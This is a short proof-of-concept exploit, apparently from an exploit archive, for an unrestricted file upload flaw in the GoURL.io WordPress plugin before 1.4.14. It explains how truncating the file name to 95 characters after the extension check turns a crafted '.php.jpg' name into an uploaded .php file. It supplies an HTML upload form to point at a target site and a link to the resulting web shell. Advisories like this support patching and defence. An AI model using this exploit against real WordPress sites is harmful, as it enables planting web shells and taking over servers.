WordPress Plugin GoURL.io < 1.4.14 - File Upload




        GoURL Unrestricted Upload Vulnerability POC by @pouyadarabi

        Vulnerable Function: https://github.com/cryptoapi/Bitcoin-Wordpress-Plugin/blob/8aa17068d7ba31a05f66e0ab2bbb55efb0f60017/gourl.php#L5637
          After the file extension is checked, substring is applied to the file name to keep only its first 95 characters (line #5655).
          So a file name like "123456789a123456789b123456789c123456789d123456789e123456789f123456789g123456789h123456789i1.php.jpg"
          will upload a file with a .php extension to the website :)




        Replace with target WordPress website
        Set the id param in the form action to any active download product


    <form action="" method="POST" enctype="multipart/form-data">

        <input type="file" name="gourlimage2" />
        <input type="submit"/>

    <a href="">Shell link</a>

